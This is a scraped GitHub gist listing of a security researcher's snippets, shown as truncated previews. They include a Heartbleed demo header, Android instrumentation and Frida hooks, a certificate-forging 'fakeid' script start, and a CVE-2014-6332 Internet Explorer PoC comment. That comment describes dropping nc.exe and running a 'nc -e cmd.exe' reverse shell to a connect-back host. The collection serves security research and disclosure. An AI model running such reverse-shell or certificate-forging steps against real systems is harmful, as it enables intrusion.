@flankerhqd
flankerhqd / sslfun.py
Last active August 29, 2015 13:58
python sslfun
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
@flankerhqd
flankerhqd / ddi test
Created May 10, 2014 06:44
ddi SmsManager hook test
/*
* Collin's Dynamic Dalvik Instrumentation Toolkit for Android
* Collin Mulliner <collin[at]mulliner.org>
*
* (c) 2012,2013
*
* License: LGPL v2.1
*
*/
# Path to your oh-my-zsh installation.
export ZSH=$HOME/.oh-my-zsh
# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME="ys"
# Example aliases
@flankerhqd
flankerhqd / ddi class dump
Created July 10, 2014 14:45
ddi class dump
I/dalvikvm( 705): Ljava/lang/Long;
I/dalvikvm( 705): Landroid/graphics/LightingColorFilter;
I/dalvikvm( 705): Landroid/os/StrictMode$LogStackTrace;
I/dalvikvm( 705): Landroid/net/Uri$Part;
I/dalvikvm( 705): Lcom/android/internal/app/AlertController$ButtonHandler;
I/dalvikvm( 705): Landroid/widget/QuickContactBadge$QueryHandler;
I/dalvikvm( 705): Ljava/security/KeyFactorySpi;
I/dalvikvm( 705): Landroid/util/StateSet;
I/dalvikvm( 705): Lcom/android/org/bouncycastle/asn1/x509/AlgorithmIdentifier;
I/dalvikvm( 705): Ljava/util/concurrent/Executors$DefaultThreadFactory;
@flankerhqd
flankerhqd / Python
Created August 18, 2014 02:52
fakeid CA script from BH presentation
import OpenSSL
from OpenSSL.crypto import *
#assume you've already generated client.cer
#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA
cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read())
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024)
import org.sireum.util._
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.alir.reachingFactsAnalysis.AndroidReachingFactsAnalysisConfig
import org.sireum.jawa.util.Timer
import org.sireum.amandroid.security.apiMisuse.InterestingApiCollector
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.util.AndroidLibraryAPISummary
import org.sireum.amandroid.AppCenter
import org.sireum.jawa.alir.reachability.ReachabilityAnalysis
import org.sireum.jawa.JawaCodeSource
<html>
<head>
<!--
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell
The PoC drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
script = session.create_script('''
Dalvik.perform(function () {
var Activity = Dalvik.use("com.example.myapp.MyActivity");
Activity.hookMe.overload("java.lang.String").implementation = function () {
Activity.hookMe.overload("java.lang.String").call(args[0], "foo"); // commenting out this line avoids the crash
return "foo";
};
});
''')
// This results in an immediate crash
@flankerhqd
flankerhqd / LICENSE
Last active August 29, 2015 14:24 — forked from dweinstein/LICENSE
The MIT License (MIT)
Copyright (c) 2015 David Weinstein
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
@flankerhqd
flankerhqd / gist:5e007ad6e55ecfcc19e1
Created August 25, 2015 06:51
soot cfg commandline
java -cp soot.jar:app-debug.apk soot.tools.CFGViewer --graph=BriefBlockGraph -src-prec apk -android-jars /home/xxx/android-sdks/platforms/ -process-dir app-debug.apk -f J -allow-phantom-refs